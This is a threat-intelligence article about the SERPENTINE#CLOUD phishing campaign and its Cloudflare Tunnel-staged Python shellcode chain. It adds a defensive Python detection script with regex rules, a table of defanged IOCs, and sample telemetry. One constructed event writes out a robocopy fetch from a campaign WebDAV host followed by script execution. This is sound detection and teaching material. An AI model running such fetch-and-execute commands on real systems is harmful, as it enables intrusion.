A sophisticated malware campaign, tracked as SERPENTINE#CLOUD, has been observed leveraging Cloudflare Tunnel infrastructure to orchestrate a complex Python-based attack against Windows systems.
First detected in attacks targeting the US, UK, Germany, and other regions across Europe and Asia, the campaign illustrates the growing trend of threat actors exploiting trusted cloud services for payload delivery and command-and-control (C2) operations.
Cloud Infrastructure Shields
The infection typically begins through phishing emails that contain links to zipped files masquerading as invoices or payment documents.
Once unpacked, the victim encounters a malicious Windows shortcut (.lnk) file, disguised as a document and adorned with a PDF icon, hiding its true extension and intent.
Upon execution, this shortcut uses native Windows tools, such as cmd.exe and robocopy, to silently retrieve malicious scripts from remote servers hosted behind ephemeral Cloudflare Tunnel (trycloudflare[.]com) subdomains, using encrypted WebDAV over HTTPS.
This cloud-based obfuscation makes detection and takedown efforts significantly more challenging, allowing the threat actors to remain anonymous and evade traditional security products.

According to the Securonix report, the attack chain is markedly multi-staged and modular. Following initial access, the .lnk file downloads and launches a Windows Script File (.wsf), itself acting as a loader to fetch an obfuscated batch script (.bat) from another Cloudflare-protected location.
This batch script is heavily obfuscated both at the encoding and logical levels to resist reverse engineering.
It performs checks for antivirus software, deploys decoy PDFs to distract users, and downloads a ZIP archive containing its Python malware toolkit.
The malicious ZIP archive holds not only the portable Python runtime but also a suite of Python scripts.
Once extracted, the batch file executes several Python payloads designed to load and inject shellcode directly into memory, bypassing disk-based detection methods.
One notable Python script (run.py) employs Early Bird APC (Asynchronous Procedure Call) injection, a sophisticated technique that injects shellcode into a newly spawned process (e.g., notepad.exe) before it begins normal execution, further complicating detection by endpoint security solutions.

Obfuscation Tactics Facilitate Stealthy Remote Access
Payload analysis revealed the use of tools like Donut (an in-memory .NET/PE loader) and the Kramer obfuscator for Python, heightening the difficulty of both static and dynamic analysis.
These tools enable the attackers to deliver and execute .NET assemblies or other Portable Executable payloads solely in memory, leaving minimal forensic traces.
The Python shellcode loaders use RC4 encryption and custom XOR keys for payload decryption, and rely on Python’s ctypes module to interface directly with the Windows API.
Persistence on the victim system is achieved by dropping and registering additional scripts and batch files into the Windows startup directory, ensuring the attack chain is relaunched on every user login.
The malware takes evasion a step further with simple scripts that keep the machine active, preventing system idle or sleep states that might interrupt execution or facilitate detection.
Cloudflare Tunnel’s legitimate use, commonly as a development tool for exposing local services, provides an ideal staging ground for temporary, disposable malicious infrastructure.
The tunnel traffic is SSL/TLS encrypted, fronted by Cloudflare’s global CDN, and rarely blocked or flagged by enterprise security products due to its association with a highly reputable service.
To mitigate such threats, organizations are urged to educate users about phishing risks, enable file extension visibility, monitor for script and unusual process execution in user directories (such as %HOME%\Contacts), and closely inspect network traffic to development-centric domains like trycloudflare[.]com.
Detection strategies should also incorporate behavioral indicators related to script execution, process injection, and anomalous persistence mechanisms.
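As an added illustration of the detection guidance above (example code written for this page, not from the article or from Securonix), the following Python triage script runs a handful of behavioral checks over endpoint telemetry: a double-extension .pdf.lnk file, any reference to a trycloudflare.com subdomain, a WebDAV-style UNC fetch, and a script interpreter launching a file from a user-profile directory such as Contacts. The log format, user names, local paths and regular expressions are assumptions of this example; the hostnames and file names are taken from the article's IOC table, and the sample events are constructed, not captured telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real logs from the campaign): simplified
# key=value events as an EDR or SIEM might normalise them. Hostnames and file
# names come from the article's IOC table; users and local paths are invented.
SAMPLE_EVENTS = [
    r'event=file_create user=alice path=C:\Users\alice\Downloads\RE_05FSKBSAXZ25A.pdf.lnk',
    r'event=dns user=alice query=flour-riding-merit-refers.trycloudflare.com',
    r'event=process_create user=alice image=C:\Windows\System32\cmd.exe parent=explorer.exe '
    r'cmdline="cmd.exe /c robocopy \\flour-riding-merit-refers.trycloudflare.com@SSL\DavWWWRoot C:\Users\alice\Contacts"',
    r'event=process_create user=alice image=C:\Windows\System32\wscript.exe parent=cmd.exe '
    r'cmdline="wscript.exe C:\Users\alice\Contacts\tank.wsf"',
    r'event=process_create user=bob image=C:\Windows\System32\notepad.exe parent=explorer.exe '
    r'cmdline="notepad.exe C:\Users\bob\Documents\notes.txt"',
    r'event=dns user=bob query=www.example.com',
]


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


# Each pattern is an assumption of this example, not a published Securonix signature.
# A shortcut pretending to be a document: ".pdf.lnk", ".docx.lnk", ...
DOUBLE_EXT_LNK = re.compile(r'\.(pdf|docx?|xlsx?)\.lnk\b', re.IGNORECASE)
# Any ephemeral Cloudflare Tunnel host, in DNS, proxy or command-line data.
TRYCLOUDFLARE = re.compile(r'\b[\w-]+\.trycloudflare\.com\b', re.IGNORECASE)
# WebDAV-over-HTTPS UNC form (\\host@SSL\...) used to pull files with robocopy/cmd.
WEBDAV_UNC = re.compile(r'\\\\[\w.-]+@SSL\\', re.IGNORECASE)
# A script host or interpreter executing a script out of a user-profile directory.
USER_SCRIPT = re.compile(
    r'(wscript|cscript|cmd|powershell|python\w*)\.exe.*?'
    r'(C:\\Users\\[^\\\s"]+\\(Contacts|AppData|Downloads)\\[^\s"]+\.(wsf|bat|vbs|py))',
    re.IGNORECASE,
)


def scan_events(events):
    """Apply every rule to every event; return one Finding per rule hit."""
    findings = []
    for i, line in enumerate(events):
        if m := DOUBLE_EXT_LNK.search(line):
            findings.append(Finding("double_extension_lnk", i, m.group(0)))
        if m := TRYCLOUDFLARE.search(line):
            findings.append(Finding("trycloudflare_host", i, m.group(0)))
        if m := WEBDAV_UNC.search(line):
            findings.append(Finding("webdav_unc_fetch", i, m.group(0)))
        if m := USER_SCRIPT.search(line):
            findings.append(Finding("script_from_user_dir", i, m.group(2)))
    return findings


def users_with_chain(events, min_rules=3):
    """Correlate per user: report users whose events hit at least min_rules distinct
    rules, which is far stronger evidence of the multi-stage chain than any single hit."""
    by_user = {}
    for f in scan_events(events):
        user_m = re.search(r'\buser=(\S+)', events[f.event_index])
        user = user_m.group(1) if user_m else "?"
        by_user.setdefault(user, set()).add(f.rule)
    return {u: sorted(rules) for u, rules in by_user.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
    print("users with a correlated chain:", users_with_chain(SAMPLE_EVENTS))
```

Individually, a trycloudflare.com lookup or a script in a user directory may be benign (developers do use Cloudflare Tunnel), which is why the correlation step requires several distinct behaviors from the same user before raising the alert; in a real SIEM the same logic would be expressed as a multi-condition rule keyed on user or host over a short time window.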
While attribution remains uncertain, the campaign’s sophistication, use of English-language code comments, and focus on Western organizations indicate an advanced actor refining scalable infection vectors under the cover of legitimate cloud infrastructure.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| Domains | nhvncpure[.]shop, nhvncpure[.]sbs, nhvncpure[.]click, nhvncpurekfl.duckdns[.]org, twilightparadox[.]com, strangled[.]net, mooo[.]com, nhvncpure.duckdns[.]org, etc. |
| IP Addresses | 51.89.212[.]145, 192.169.69[.]26 |
| Cloudflare Subdomains | flour-riding-merit-refers.trycloudflare[.]com, depot-arrange-zero-kai.trycloudflare[.]com, eastern-instructional-ant-jungle.trycloudflare[.]com, others |
| File Names | RE_05FSKBSAXZ25A.pdf.lnk, tank.wsf, kiki.bat, cam.zip, FTSP.zip, run.py, Jun02_an.py, Okwan1.py, Wsandy1.py, pws1.vbs, PWS.vbs, startuppp.bat |
| Hashes (SHA256) | 193218243C54D7903C65F5E7BE9B865DDB286DA9005C69E6E955E31EC3EFA1A7, 3CF0E84EA719B026AA6EF04EE7396974AEB3EC3480823FD0BB1867043C6D2BF9, etc. |
| C2 URLs | hxxps://flour-riding-merit-refers.trycloudflare[.]com, hxxps://depot-arrange-zero-kai.trycloudflare[.]com, hxxps://eastern-instructional-ant-jungle.trycloudflare[.]com/cam.zip |